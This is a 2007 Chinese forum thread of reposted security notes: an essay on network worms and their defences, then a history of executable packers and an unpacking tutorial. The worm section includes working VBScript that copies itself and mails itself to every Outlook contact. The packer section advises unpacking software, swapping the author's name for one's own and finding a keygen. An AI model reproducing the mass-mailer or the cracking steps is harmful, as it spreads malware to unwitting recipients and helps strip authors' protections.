菜鸟到黑客的捷径 网络知识大总结  看不懂别怪我_派派后花园

用户中心 游戏论坛 社区服务
发帖 回复
阅读:23147 回复:85

菜鸟到黑客的捷径 网络知识大总结  看不懂别怪我

刷新数据 楼层直达
tmd88600

ZxID:1279065

等级: 禁止发言
配偶: 琳儿来也
举报 只看该作者 60楼  发表于: 2007-11-16 0
蠕虫技术(上)

凡能够引起计算机故障,破坏计算机数据的程序统称为计算

机病毒。所以从这个意义上说,蠕虫也是一种病毒!网络蠕虫病毒,

作为对互联网危害严重的一种计算机程序,其破坏力和传染性不容忽

视.与传统的病毒不同,蠕虫病毒以计算机为载体,以网络为攻击对

象!本文中将蠕虫病毒分为针对企业网络和个人用户2类,并从企业

用户和个人用户两个方面探讨蠕虫病毒的特征和一些防范措施!
本文根据蠕虫病毒的发作机制,将其分为利用系统级别漏洞(主动传

播)和利用社会工程学(欺骗传播)两种,并从用户角度中将蠕虫病毒

分为针对企业网络和个人用户2类,从企业用户和个人用户两个方面

探讨蠕虫病毒的特征和一些防范措施!
一 蠕虫病毒定义
1蠕虫病毒的定义
2蠕虫病毒与一般病毒的异同
3蠕虫病毒的危害和趋势
二 蠕虫病毒的分析和防范
1企业用户的防止蠕虫
2个人用户防止蠕虫
三 研究蠕虫的现实意义
一 蠕虫病毒的定义
1.1蠕虫病毒的定义
计算机病毒自出现之日起,就成为计算机的一个巨大威胁,而当网络

迅速发展的时候,蠕虫病毒引起的危害开始显现!从广义上定义,凡

能够引起计算机故障,破坏计算机数据的程序统称为计算机病毒。所

以从这个意义上说,蠕虫也是一种病毒!但是蠕虫病毒和一般的病毒

有着很大的区别.对于蠕虫,现在还没有一个成套的理论体系,一般认

为,蠕虫是一种通过网络传播的恶性病毒,它具有病毒的一些共性,如

传播性,隐蔽性,破坏性等等,同时具有自己的一些特征,如不利用文

件寄生(有的只存在于内存中),对网络造成拒绝服务,以及和黑客

技术相结合等等!在产生的破坏性上,蠕虫病毒也不是普通病毒所能

比拟的,网络的发展使得蠕虫可以在短短的时间内蔓延整个网络,造

成网络瘫痪!
在本论文中,根据使用者情况将蠕虫病毒分为2类,一种是面向企业用

户和局域网而言,这种病毒利用系统漏洞,主动进行攻击,可以对整个

互联网可造成瘫痪性的后果!以“红色代码”,“尼姆达”,以及最

新的“sql蠕虫王”为代表。另外一种是针对个人用户的,通过网络(

主要是电子邮件,恶意网页形式)迅速传播的蠕虫病毒,以爱虫病毒,求

职信病毒为例.在这两类中,第一类具有很大的主动攻击性,而且爆

发也有一定的突然性,但相对来说,查杀这种病毒并不是很难。第二

种病毒的传播方式比较复杂和多样,少数利用了微软的应用程序的漏

洞,更多的是利用社会工程学()对用户进行欺骗和诱使,这样的病毒

造成的损失是非常大的,同时也是很难根除的,比如求职信病毒,在

2001年就已经被各大杀毒厂商发现,但直到2002年底依然排在病毒危

害排行榜的首位就是证明!出得在接下来的内容中,将分别分析这两

种病毒的一些特征及防范措施!





1.2蠕虫病毒与一般病毒的异同
蠕虫也是一种病毒,因此具有病毒的共同特征。一般的病毒是需要的

寄生的,它可以通过自己指令的执行,将自己的指令代码写到其他程

序的体内,而被感染的文件就被称为”宿主”,例如,windows下可执

行文件的格式为pe格式(Portable Executable),当需要感染pe文件时

,在宿主程序中,建立一个新节,将病毒代码写到新节中,修改的程

序入口点等,这样,宿主程序执行的时候,就可以先执行病毒程序,

病毒程序运行完之后,在把控制权交给宿主原来的程序指令。可见,

病毒主要是感染文件,当然也还有像DIRII这种链接型病毒,还有引

导区病毒。引导区病毒他是感染磁盘的引导区,如果是软盘被感染,

这张软盘用在其他机器上后,同样也会感染其他机器,所以传播方式

也是用软盘等方式。
蠕虫一般不采取利用pe格式插入文件的方法,而是复制自身在互联网

环境下进行传播,病毒的传染能力主要是针对计算机内的文件系统而

言,而蠕虫病毒的传染目标是互联网内的所有计算机.局域网条件下的

共享文件夹,电子邮件email,网络中的恶意网页,大量存在着漏洞的

服务器等都成为蠕虫传播的良好途径。网络的发展也使得蠕虫病毒可

以在几个小时内蔓延全球!而且蠕虫的主动攻击性和突然爆发性将使

得人们手足无策!
普通病毒 蠕虫病毒
存在形式 寄存文件 独立程序
传染机制 宿主程序运行 主动攻击
传染目标 本地文件 网络计算机
tmd88600

ZxID:1279065

等级: 禁止发言
配偶: 琳儿来也
举报 只看该作者 61楼  发表于: 2007-11-16 0
蠕虫技术(中)


可以预见,未来能够给网络带来重大灾难的主要必定是网络蠕虫!
1.3蠕虫的破坏和发展趋势
1988年一个由美国CORNELL大学研究生莫里斯编写的蠕虫病毒蔓延造

成了数千台计算机停机,蠕虫病毒开始现身网络;而后来的红色代码

,尼姆达病毒疯狂的时候,造成几十亿美元的损失;北京时间2003年1

月26日, 一种名为“2003蠕虫王”的电脑病毒迅速传播并袭击了全球

,致使互联网网路严重堵塞,作为互联网主要基础的域名服务器

(DNS)的瘫痪造成网民浏览互联网网页及收发电子邮件的速度大幅

减缓, 同时银行自动提款机的运作中断, 机票等网络预订系统的运作

中断, 信用卡等收付款系统出现故障!专家估计,此病毒造成的直接经

济损失至少在12亿美元以上!
病毒名称 持续时间 造成损失
莫里斯蠕虫 1988年 6000多台计算机停机,直接经济损失达9600万美

元!
美丽杀手 1999年3月 政府部门和一些大公司紧急关闭了网络服务器,

经济损失超过12亿美元!
爱虫病毒 2000年5月至今 众多用户电脑被感染,损失超过100亿美元

以上,
红色代码 2001年7月 网络瘫痪,直接经济损失超过26亿美元
求职信 2001年12月至今 大量病毒邮件堵塞服务器,损失达数百亿美


Sql蠕虫王 2003年1月 网络大面积瘫痪,银行自动提款机运做中断,直

接经济损失超过26亿美元
由表可以知道,蠕虫病毒对网络产生堵塞作用,并造成了巨大的经济损

失!
通过对以上蠕虫病毒的分析,可以知道,蠕虫发作的一些特点和发展趋

势:
1.利用操作系统和应用程序的漏洞主动进行攻击.. 此类病毒主要是

“红色代码”和“尼姆达”,以及至今依然肆虐的”求职信”等.由于

IE浏览器的漏洞(Iframe ExecCommand),使得感

染了“尼姆达”病毒的邮件在不去手工打开附件的情况下病毒就能激

活,而此前即便是很多防病毒专家也一直认为,带有病毒附件的邮件

,只要不去打开附件,病毒不会有危害。“红色代码”是利用了微软

IIS服务器软件的漏洞(idq.dll远程缓存区溢出)来传播。Sql蠕虫王

病毒则是利用了微软的数据库系统的一个漏洞进行大肆攻击!
2传播方式多样 如“尼姆达”病毒和”求职信”病毒,可利用的传播

途径包括文件、电子邮件、Web服务器、网络共享等等.
  3.病毒制作技术新 与传统的病毒不同的是,许多新病毒是利用当

前最新的编程语言与编程技术实现的,易于修改以产生新的变种,从

而逃避反病毒软件的搜索。另外,新病毒利用Java、ActiveX、VB

script等技术,可以潜伏在HTML页面里,在上网浏览时触发。  




4.与黑客技术相结合! 潜在的威胁和损失更大!以红色代码为例,

感染后的机器的web目录的scripts下将生成一个root.exe,可以远程

执行任何命令,从而使黑客能够再次进入!


二网络蠕虫病毒分析和防范
蠕虫和普通病毒不同的一个特征是蠕虫病毒往往能够利用漏洞,这里

的漏洞或者说是缺陷,我们分为2种,软件上的缺陷和人为上的缺陷

。软件上的缺陷,如远程溢出,微软ie和outlook的自动执行漏洞等

等,需要软件厂商和用户共同配合,不断的升级软件。而人为的缺陷

,主要是指的是计算机用户的疏忽。这就是所谓的社会工程学

(social engineering),当收到一封邮件带着病毒的求职信邮件时候

,大多数人都会报着好奇去点击的。对于企业用户来说,威胁主要集

中在服务器和大型应用软件的安全上,而个人用户而言,主要是防范

第二种缺陷。
2.1利用系统漏洞的恶性蠕虫病毒分析
在这种病毒中,以红色代码,尼姆达和sql蠕虫为代表!他们共同的特征

是利用微软服务器和应用程序组件的某个漏洞进行攻击,由于网上存

在这样的漏洞比较普遍,使得病毒很容易的传播!而且攻击的对象大都

为服务器,所以造成的网络堵塞现象严重!
以2003年1月26号爆发的sql蠕虫为例,爆发数小时内席卷了全球网络,

造成网络大塞车.亚洲国家中以人口上网普及率达七成的韩国所受影

响较为严重。韩国两大网络业KFT及南韩电讯公司,系统都陷入了瘫

痪,其它的网络用户也被迫断线,更为严重的是许多银行的自动取款

机都无法正常工作, 美国许美国银行统计,该行的13000台自动柜员

机已经无法提供正常提款。网络蠕虫病毒开始对人们的生活产生了巨

大的影响!
这次sql蠕虫攻击的是微软数据库系Microsoft SQL Server 2000的,

利用了MSSQL2000服务远程堆栈缓冲区溢出漏洞, Microsoft SQL

Server 2000是一款由Microsoft公司开发的商业性质大型数据库系统

。 SQL Server监听UDP的1434端口,客户端可以通过发送消息到这个

端口来查询目前可用的连接方式(连接方式可以是命名管道也可以是

TCP),但是此程序存在严重漏洞,当客户端发送超长数据包时,将

导致缓冲区溢出,黑客可以利用该漏洞在远程机器上执行自己的恶意

代码。
微软在200年7月份的时候就为这个漏洞发布了一个安全公告,但当sql

蠕虫爆发的时候,依然有大量的装有ms sqlserver 2000的服务器没有

安装最新的补丁,从而被蠕虫病毒所利用,蠕虫病毒通过一段376个字

节的恶意代码,远程获得对方主机的系统控制权限, 取得三个Win32

API地址,GetTickCount、socket、sendto,接着病毒使用

GetTickCount获得一个随机数,进入一个死循环继续传播。在该循环

中蠕虫使用获得的随机数生成一个随机的ip地址,然后将自身代码发

送至1434端口(Microsoft SQL Server开放端口),该蠕虫传播速度极

快,其使用广播数据包方式发送自身代码,每次均攻击子网中所有

255台可能存在机器。由于这是一个死循环的过程,发包密度仅和机

器性能和网络带宽有关,所以发送的数据量非常大。该蠕虫对被感染

机器本身并没有进行任何恶意破坏行为,也没有向硬盘上写文件,仅

仅存在与内存中。对于感染的系统,重新启动后就可以清除蠕虫,但

是仍然会重复感染。由于发送数据包占用了大量系统资源和网络带宽

,形成Udp Flood,感染了该蠕虫的网络性能会极度下降。一个百兆

网络内只要有一两台机器感染该蠕虫就会导致整个网络访问阻塞。
通过以上分析可以知道,此蠕虫病毒本身除了对网络产生拒绝服务攻

击外,并没有别的破坏措施.但如果病毒编写者在编写病毒的时候加入

破坏代码,后果将不堪设想!
tmd88600

ZxID:1279065

等级: 禁止发言
配偶: 琳儿来也
举报 只看该作者 62楼  发表于: 2007-11-16 0
蠕虫技术(下)


2.3企业防范蠕虫病毒措施
此次sql蠕虫病毒,利用的漏洞在2002年7月份微软的一份安全公告中

就有详细说明!而且微软也提供了安全补丁提供下载,然而在时隔半

年之后互联网上还有相当大的一部分服务器没有安装最新的补丁,其

网络管理员的安全防范意识可见一斑!
当前,企业网络主要应用于文件和打印服务共享、办公自动化系统、

企业业务(MIS)系统、Internet应用等领域。网络具有便利信息交

换特性,蠕虫病毒也可以充分利用网络快速传播达到其阻塞网络目的

。企业在充分地利用网络进行业务处理时,就不得不考虑企业的病毒

防范问题,以保证关系企业命运的业务数据完整不被破坏。
企业防治蠕虫病毒的时候需要考虑几个问题:病毒的查杀能力,病毒

的监控能力,新病毒的反应能力。而企业防毒的一个重要方面是是管

理和策略。推荐的企业防范蠕虫病毒的策略如下:
1. 加强网络管理员安全管理水平,提高安全意识。由于蠕虫病毒利

用的是系统漏洞进行攻击,所以需要在第一时间内保持系统和应用软

件的安全性,保持各种操作系统和应用软件的更新!由于各种漏洞的

出现,使得安全不在是一种一劳永逸的事,而作为企业用户而言,所

经受攻击的危险也是越来越大,要求企业的管理水平和安全意识也越

来越高!
2. 建立病毒检测系统。能够在第一时间内检测到网络异常和病毒攻

击。
3. 建立应急响应系统,将风险减少到最小!由于蠕虫病毒爆发的突

然性,可能在病毒发现的时候已经蔓延到了整个网络,所以在突发情

况下,建立一个紧急响应系统是很有必要的,在病毒爆发的第一时间

即能提供解决方案。
4. 建立灾难备份系统。对于数据库和数据系统,必须采用定期备份

,多机备份措施,防止意外灾难下的数据丢失!
5. 对于局域网而言,可以采用以下一些主要手段:(1)在因特网

接入口处安装防火墙式防杀计算机病毒产品,将病毒隔离在局域网之

外。(2)对邮件服务器进行监控,防止带毒邮件进行传播!(3)对

局域网用户进行安全培训。(4)建立局域网内部的升级系统,包括

各种操作系统的补丁升级,各种常用的应用软件升级,各种杀毒软件

病毒库的升级等等!





.3对个人用户产生直接威胁的蠕虫病毒
在以上分析的蠕虫病毒中,只对安装了特定的微软组件的系统进行攻

击,而对广大个人用户而言,是不会安装iis(微软的因特网服务器程

序,可以使允许在网上提供web服务)或者是庞大的数据库系统的!因

此上述病毒并不会直接攻击个个人用户的电脑(当然能够间接的通过

网络产生影响),但接下来分析的蠕虫病毒,则是对个人用户威胁最

大,同时也是最难以根除,造成的损失也更大的一类蠕虫病毒!
对于个人用户而言,威胁大的蠕虫病毒采取的传播方式一般为电子邮

件(Email)以及恶意网页等等!
对于利用email传播得蠕虫病毒来说,通常利用的是社会工程学

(Social Engineering),即以各种各样的欺骗手段那诱惑用户点击的

方式进行传播!
恶意网页确切的讲是一段黑客破坏代码程序,它内嵌在网页中,当用

户在不知情的情况下打开含有病毒的网页时,病毒就会发作。这种病

毒代码镶嵌技术的原理并不复杂,所以会被很多怀不良企图者利用,

在很多黑客网站竟然出现了关于用网页进行破坏的技术的论坛,并提

供破坏程序代码下载,从而造成了恶意网页的大面积泛滥,也使越来

越多的用户遭受损失。
对于恶意网页,常常采取vb script和java script编程的形式!由于

编程方式十分的简单!所以在网上非常的流行!
Vb script和java script是由微软操作系统的wsh(Windows

scripting HostWindows脚本主机)解析并执行的,由于其编程非常

简单,所以此类脚本病毒在网上疯狂传播,疯狂一时的爱虫病毒就是

一种vbs脚本病毒,然后伪装成邮件附件诱惑用户点击运行,更为可

怕的是,这样的病毒是以源代码的形式出现的,只要懂得一点关于脚

本编程的人就可以修改其代码,形成各种各样的变种。
下面以一个简单的脚本为例:
Set objFs=CreateObject (“scripting.FileSystemObject”)(创

建一个文件系统对象)  objFs.CreateTextFile

("C:virus.txt", 1)(通过文件系统对象的方法创建了TXT文件) 

 如果我们把这两句话保存成为.vbs的VB脚本文件,点击就会在C盘

中创建一个TXT文件了。倘若我们把第二句改为:
objFs.GetFile (Wscript.scriptFullName).Copy

("C:virus.vbs")
就可以将自身复制到C盘virus.vbs这个文件。本句前面是打开这个脚

本文件,Wscript.scriptFullName指明是这个程序本身,是一个完整

的路径文件名。GetFile函数获得这个文件,Copy函数将这个文件复

制到C盘根目录下virus.vbs这个文件。这么简单的两句就实现了自我

复制的功能,已经具备病毒的基本特征——自我复制能力。
此类病毒往往是通过邮件传播的,在vb script中调用邮件发送功能

也非常的简单,病毒往往采用的方法是向outlook中的地址薄中的邮

件地址发送带有包含自身的邮件来达到传播目的,一个简单的实例如

下:
Set objOA=Wscript.CreateObject ("Outlook.Application")(创

建一个OUTLOOK应用的对象)
Set objMapi=objOA.GetNameSpace ("MAPI")(取得MAPI名字空间


For i=1 to objMapi.AddressLists.Count(遍历地址簿)
Set objAddList=objMapi.AddressLists (i)
For j=1 To objAddList. AddressEntries.Count
Set objMail=objOA.CreateItem (0)
objMail.Recipients.Add (objAddList. AddressEntries (j))

(取得收件人邮件地址 )  objMail.Subject="你好!" (设置邮

件主题,这个往往具有很大的诱惑性质)
objMail.Body="这次给你的附件,是我的新文档!" (设置信件内容


objMail.Attachments.Add (“c:virus.vbs")(把自己作为附件

扩散出去 )
objMail.Send  (发送邮件)
Next
Next
Set objMapi=Nothing  (清空objMapi变量,释放资源)
set objOA=Nothing  (清空objOA变量)
  这一小段代码的功能是向地址簿中的用户发送电子邮件,并将自

己作为附件扩散出去。这段代码中的第一行是创建一个Outlook的对

象,是必不可少的。在其下是一个循环,在循环中不断地向地址簿中

的电子邮件地址发送内容相同的信件。这就是蠕虫的传播性。
由此可以看出,利用vb script编写病毒是非常容易的,这就使得此

类病毒的变种繁多,破坏力极大,同时也是非常难以根除的!
2.4个人用户对蠕虫病毒的防范措施
通过上述的分析,我们可以知道,病毒并不是非常可怕的,网络蠕虫

病毒对个人用户的攻击主要还是通过社会工程学,而不是利用系统漏

洞!所以防范此类病毒需要注意以下几点:




1.购合适的杀毒软件!网络蠕虫病毒的发展已经使传统的杀毒软件

的“文件级实时监控系统”落伍,杀毒软件必须向内存实时监控和邮

件实时监控发展!另外面对防不胜防的网页病毒,也使得用户对杀毒

软件的要求越来越高!在杀毒软件市场上,赛门铁克公司的norton系

列杀毒软件在全球具有很大的比例!经过多项测试,norton杀毒系列

软件脚本和蠕虫阻拦技术能够阻挡大部分电子邮件病毒,而且对网页

病毒也有相当强的防范能力!目前国内的杀毒软件也具有了相当高的

水平.像瑞星,kv系列等杀毒软件,在杀毒软件的同时整合了防火强功

能,从而对蠕虫兼木马程序有很大克制作用.
2 。经常升级病毒库,杀毒软件对病毒的查杀是以病毒的特征码为依

据的,而病毒每天都层出不穷,尤其是在网络时代,蠕虫病毒的传播速

度快,变种多,所以必须随时更新病毒库,以便能够查杀最新的病毒!
3.提高防杀毒意识.不要轻易去点击陌生的站点,有可能里面就含有

恶意代码!
当运行IE时,点击“工具→Internet选项→安全→ Internet区域的

安全级别”,把安全级别由“中”改为“高” 。、因为这一类网页

主要是含有恶意代码的ActiveX或Applet、 javascript的网页文件

,所以在IE设置中将ActiveX插件和控件、Java脚本等全部禁止就可

以大大减少被网页恶意代码感染的几率。具体方案是:在IE窗口中点

击“工具”→“Internet选项”,在弹出的对话框中选择“安全”标

签,再点击“自定义级别”按钮,就会弹出“安全设置”对话框,把

其中所有ActiveX插件和控件以及与Java相关全部选项选择“禁用”

。但是,这样做在以后的网页浏览过程中有可能会使一些正常应用

ActiveX的网站无法浏览。
4.不随意查看陌生邮件,尤其是带有附件的邮件,,由于有的病毒

邮件能够利用ie和outlook的漏洞自动执行,所以计算机用户需要升

级ie和outlook程序,及常用的其他应用程序!


三小结
网络蠕虫病毒作为一种互联网高速发展下的一种新型病毒,必将对网

络产生巨大的危险。在防御上,已经不再是由单独的杀毒厂商所能够

解决,而需要网络安全公司,系统厂商,防病毒厂商及用户共同参与

,构筑全方位的防范体系!
蠕虫和黑客技术的结合,使得对蠕虫的分析,检测和防范具有一定的

难度,同时对蠕虫的网络传播性,网络流量特性建立数学模型也是有

待研究的工作!
tmd88600

ZxID:1279065

等级: 禁止发言
配偶: 琳儿来也
举报 只看该作者 63楼  发表于: 2007-11-16 0
壳(上)


  首先我想大家应该先明白“壳”的概念。在自然界中,我想大家对壳这东西应该都不会陌生了,植物用它来保护种子,动物用它来保护身体等等。同样,在一些计算机软件里也有一段专门负责保护软件不被非法修改或反编译的程序。它们一般都是先于程序运行,拿到控制权,然后完成它们保护软件的任务。就像动植物的壳一般都是在身体外面一样理所当然(但后来也出现了所谓的“壳中带籽”的壳)。由于这段程序和自然界的壳在功能上有很多相同的地方,基于命名的规则,大家就把这样的程序称为“壳”了。就像计算机病毒和自然界的病毒一样,其实都是命名上的方法罢了。

   最早提出“壳”这个概念的,据我所知,应该是当年推出脱壳软件 RCOPY 3 的作者熊焰先生。在几年前的 DOS 时代,“壳”一般都是指磁盘加密软件的段加密程序,可能是那时侯的加密软件还刚起步不久吧,所以大多数的加密软件(加壳软件)所生成的“成品”在“壳”和需要加密的程序之间总有一条比较明显的“分界线”。有经验的人可以在跟踪软件的运行以后找出这条分界线来,至于这样有什么用这个问题,就不用我多说了。但毕竟在当时,甚至现在这样的人也不是很多,所以当 RCOPY3 这个可以很容易就找出“分界线”,并可以方便的去掉“壳”的软件推出以后,立即就受到了很多人的注意。老实说,这个我当年在《电脑》杂志看到广告,在广州电脑城看到标着999元的软件,在当时来说,的确是有很多全新的构思,单内存生成 EXE 可执行文件这项,就应该是世界首创了。但它的思路在程序的表现上我认为还有很多可以改进的地方(虽然后来出现了可以加强其功力的 RO97),这个想法也在后来和作者的面谈中得到了证实。在这以后,同类型的软件想雨后春笋一般冒出来,记得住名字的就有: UNKEY、MSCOPY、UNALL .... 等等,但很多的软件都把磁盘解密当成了主攻方向,忽略了其它方面,当然这也为以后的“密界克星”“解密机器”等软件打下了基础,这另外的分支就不多祥谈了,相信机龄大一点的朋友都应该看过当时的广告了。

   解密(脱壳)技术的进步促进、推动了当时的加密(加壳)技术的发展。LOCK95和 BITLOK 等所谓的“壳中带籽”加密程序纷纷出笼,真是各出奇谋,把小小的软盘也折腾的够辛苦的了。正在国内的加壳软件和脱壳软件较量得正火红的时候,国外的“壳”类软件早已经发展到像 LZEXE 之类的压缩壳了。这类软件说穿了其实就是一个标准的加壳软件,它把 EXE 文件压缩了以后,再在文件上加上一层在软件被执行的时候自动把文件解压缩的“壳”来达到压缩 EXE 文件的目的。接着,这类软件也越来越多, PKEXE、AINEXE、UCEXE 和后来被很多人认识的 WWPACK 都属于这类软件,但奇怪的是,当时我看不到一个国产的同类软件。

   过了一段时间,可能是国外淘汰了磁盘加密转向使用软件序列号的加密方法吧,保护 EXE 文件不被动态跟踪和静态反编译就显得非常重要了。所以专门实现这样功能的加壳程序便诞生了。 MESS 、CRACKSTOP、HACKSTOP、TRAP、UPS 等等都是比较有名气的本类软件代表,当然,还有到现在还是数一数二的,由中国台湾同胞所写的 FSE 。其实以我的观点来看,这样的软件才能算是正宗的加壳软件。

  在以上这些加壳软件的不断升级较劲中,很多软件都把比较“极端”技术用了上去,因为在这个时候 DOS 已经可以说是给众高手们玩弄在股掌之间了,什么保护模式、反 SICE 、逆指令等等。相对来说,在那段时间里发表的很多国外脱壳程序,根本就不能对付这么多的加壳大军,什么 UPC、TEU 等等都纷纷成为必防的对象,成绩比较理想的就只有 CUP386 了,反观国内,这段时间里也没了这方面的“矛盾斗争”。加壳软件门挥军直捣各处要岗重地,直到在我国遇到了 TR 这个铜墙铁壁以后,才纷纷败下阵来各谋对策,但这已经是一年多以后的事情了。我常想,如果 TR 能早两年“出生”的话,成就肯定比现在大得多,甚至盖过 SICE 也有可能。TR 发表的时候 WIN95 的流行已经成为事实,DOS 还有多少的空间,大家心里都清楚。但话又说回来, TR 的确是个好软件,比起当年的 RCOPY3 有过之而无不及,同时也证明了我们中国的 CRACK 实力(虽然有点过时)。这个时候,前面提到过的 FSE 凭着强劲的实力也渐渐的浮出了水面,独领风骚。其时已经是 1997 年年底了,我也走完了学生“旅程”。工作后在CFIDO 的 CRACK 区认识了 Ding-Boy ,不久 CRACK 区关了,我从此迷上了 INTERNET,并于98年6月建起了一个专门介绍“壳”的站台: http://topage.126.com ,放上了我所收集的所有“壳”类软件。在这段时间里,各种“壳”类软件也在不段的升级换代,但都没什么太大的进展,差不多就是 TR 和众加壳软件的版本数字之争而已。

  1998年8月,一个名为 UNSEC (揭秘)的脱壳软件发表了,它号称可以脱掉98年8月以前发表的所有壳。我测试之后,觉得并没传闻中的那么厉害,特别是兼容性更是令我不想再碰它。 Ding-Boy 给这个软件的作者提了很多建议,但寄去的 EMIAL 有如泥牛入海,可能是一怒之下吧,不久 Ding-Boy 的 BW (冲击波)就诞生了。这个使用内存一次定位生成 EXE 文件(后来放弃了)的脱壳软件,在我的站台公开后,得到了很多朋友们的肯定。要知道,从RCOPY 3 开始,绝大部分的脱壳软件都是要两次运行目标程序来确定 EXE 的重定位数据的。BW 的这一特点虽然有兼容性的问题,但也树立了自己的风格、特色。经过几个月的改善, BW 升级到了 2.0 版本,这个版本的推出可以说是 BW 的转折点,因为它已经是一个成熟、稳定脱壳软件了,它可以对付当时(现在)大多数的壳,包括当时最新的 FSE 0.6 等。更重要的是这个版本把选择壳的和软件“分界线”这个最令新手头疼的步骤简化到不能再简化的地步,使更多的朋友接受了它。另外,能加强 BW 功力的 CI 模式也是其它脱壳软件没有的东西。最近,BW 发表了最新的 2.5 BETA2 版本,增强了一些方面的功能,因它竟然可以脱掉号称最厉害的磁盘加密工具 LOCKKING 2.0 的加密壳,因而进一步奠定了它在“脱壳界”的地位。说到最新,就不能不提 GTR、LTR、EDUMP、ADUMP、UPS、UPX、APACK 这几个国外的好软件了,它们每个都有自己的特色,可以说都是当今各类“壳”中的最新代表了。(这些软件和详细介绍请到我的主页查阅)

  由于 WINDOWS 3.1 只是基于 DOS 下的一个图形外壳,所以在这个平台下的“壳”类软件很少,见过的就只有像 PACKWIN 等几个有限的压缩工具,终难成气候。

   可能是 MICROSOFT 保留了 WIN95 的很多技术上的秘密吧,所以即便是 WIN95 已经推出了 3 年多的时间,也没见过在其上面运行的“壳”类软件。直到 98 年的中期,这样的软件才迟迟的出现,而这个时候 WIN98 也发表了有一段日子了。应该是有 DOS 下的经验吧,这类的软件不发表由自可,一发表就一大批地的冲了出来。先是加壳类的软件如: BJFNT、PELOCKNT 等,它们的出现,使暴露了 3 年多的 WIN95 下的 PE 格式 EXE 文件得到了很好的保护。大家都应该知道现在很多 WIN95 下的软件都是用注册码的方法来区分、确定合法与非法用户的吧,有了这类加壳软件,这种注册方法的安全性提高了不少,如果大家也有自己编的 WIN95 程序,就一定要多留意一下本类软件了。接着出现的就是压缩软件了,因为 WIN95 下运行的 EXE 文件“体积”一般都比较大,所以它的实用价值比起 DOS 下的压缩软件要大很多,这类的软件也很多,早些时候的 VBOX、PEPACK、PETITE 和最近才发表的 ASPACK、UPX 都是其中的佼佼者。在 DOS 下很流行的压缩软件 WWPACK 的作者也推出了对应 WIN95 版本的 WWPACK32,由于性能并不是十分的突出,所以用的人也不太多。由于压缩软件其实也是间接给软件加了壳,所以用它们来处理 EXE 也是很多软件作者喜欢做的事情,最近新发表的很多软件里都可以看到这些加壳、加压缩软件的名字了。有加壳就一定会有脱壳的,在 WIN95 下当然也不例外,但由于编这类软件比编加壳软件要难得多,所以到目前为止,我认为就只有 PROCDUMP 这个软件能称为通用脱壳软件了,它可以对付现在大多数的加壳、压缩软件所加的壳,的确是一个难得的精品。其它的脱壳软件多是专门针对某某加壳软件而编,虽然针对性强、效果好,但收集麻烦,而且这样的脱壳软件也不多。前些时候 TR 作者也顺应潮流发表了 TR 的 WIN95 版本: TRW ,由现在的版本来看可以对付的壳还不多,有待改进。

  BW 的作者 Ding-Boy 最新发表了一个 WIN95 的 EXE 加壳软件 DBPE 。虽然它还不太成熟,但它可以为软件加上使用日期限制这个功能是其它加壳软件所没有的,或者以后的加壳软件真的会是像他说的那样可以:加壳和压缩并重、并施;随意加使用日期;加上注册码;加软件狗(磁盘)保护;加硬件序列号判别;加... 。






一.壳的概念
作者编好软件后,编译成exe可执行文件
1.有一些版权信息需要保护起来,不想让别人随便改动,如作者的姓名等
2.需要把程序搞的小一点,从而方便使用
于是,需要用到一些软件,他们能将exe可执行文件压缩,实现上述两个功能,这些软件称为加壳软件或压缩软件.
它不同于一般的winzip,winrar等压缩软件.它是压缩exe可执行文件的,压缩后的文件可以直接运行.
tmd88600

ZxID:1279065

等级: 禁止发言
配偶: 琳儿来也
举报 只看该作者 64楼  发表于: 2007-11-16 0
壳(下)


二.加壳软件
最常见的加壳软件ASPACK ,UPX,PEcompact
不常用的加壳软件WWPACK32;PE-PACK ;PETITE ;NEOLITE

三.侦测壳和软件所用编写语言的软件
1.侦测壳的软件fileinfo.exe 简称fi.exe(侦测壳的能力极强)使用方法:

第一种:待侦测壳的软件(如aa.exe)和fi.exe位于同一目录下,执行
windows起始菜单的运行,键入fi aa

第二种:待侦测壳的软件(如aa.exe)和fi.exe位于同一目录下,将aa的图标拖到fi的图标上

2.侦测壳和软件所用编写语言的软件language.exe(两个功能合为一体,很棒) 推荐language2000中文版,我的

主页可下载傻瓜式软件,运行后选取待侦测壳的软件即可(open)

3.软件常用编写语言Delphi,VisualBasic(VB)---最难破,VisualC(VC)


脱壳

拿到一个软件,我们首先根据第一课的内容。侦测它的壳,然后我们要把它的壳脱去,还原它的本来面目.若它没有加壳,就省事不用脱壳了.

一.脱壳软件
unaspack,caspr,upx,unpecompact,procdump
二.使用方法
(一)aspack壳 脱壳可用unaspack或caspr
1.unaspack 我的主页可下载中文版
使用方法类似lanuage
傻瓜式软件,运行后选取待脱壳的软件即可. 缺点:只能脱aspack早些时候版本的壳,不能脱高版本的壳
2.caspr
第一种:待脱壳的软件(如aa.exe)和caspr.exe位于同一目录下,执行
windows起始菜单的运行,键入 caspr aa.exe
脱壳后的文件为aa.ex_,删掉原来的aa.exe,将aa.ex_改名为aa.exe即可
使用方法类似fi 优点:可以脱aspack任何版本的壳,脱壳能力极强 缺点:Dos界面
第二种:将aa.exe的图标拖到caspr.exe的图标上
***若已侦测出是aspack壳,用unaspack脱壳出错,说明是aspack高版本的壳,用caspr脱即可

(二)upx壳 脱壳可用upx
待脱壳的软件(如aa.exe)和upx.exe位于同一目录下,执行windows起始菜单的运行,键入upx -d aa.exe

(三)PEcompact壳 脱壳用unpecompact
使用方法类似lanuage。傻瓜式软件,运行后选取待脱壳的软件即可

(四)procdump 万能脱壳但不精,一般不要用 我的主页可下载中文版
使用方法:运行后,先指定壳的名称,再选定欲脱壳软件,确定即可
脱壳后的文件大于原文件。由于脱壳软件很成熟,手动脱壳一般用不到,不作介绍.

三. exe可执行文件编辑软件ultraedit
下载它的汉化版本,它的注册机可从网上搜到
ultraedit打开一个中文软件,若加壳,许多汉字不能被认出
ultraedit打开一个中文软件,若未加壳或已经脱壳,许多汉字能被认出
ultraedit可用来检验壳是否脱掉,以后它的用处还很多,请熟练掌握
例如,可用它的替换功能替换作者的姓名为你的姓名
注意字节必须相等,两个汉字替两个,三个替三个,不足处在ultraedit编辑器左边用00补


四.常用资源
1.破解工具站点(以上工具从这里找)
www.exetools.com
www.pediy.com
http://www.programmerstools.com(guowai/
www.cracknow.com
2.软件站点
www.newhua.com
www.hktk.com
http://www.esoftware.com.cn/ (强烈推荐,这里能找到软件的各个版本,尤其是旧版本。以后破解例子中所用软件一般在这儿都能找到)
www.shareware.net.cn
www.csdn.net

五.国外破解站点

-----------破解教程类:---------
1. +HCU Academy - http://Tsehp(dot)cjb(dot)net (Academy - Best)

2. The Krobar Collection: http://Krobar.cjb.net (Recommended)

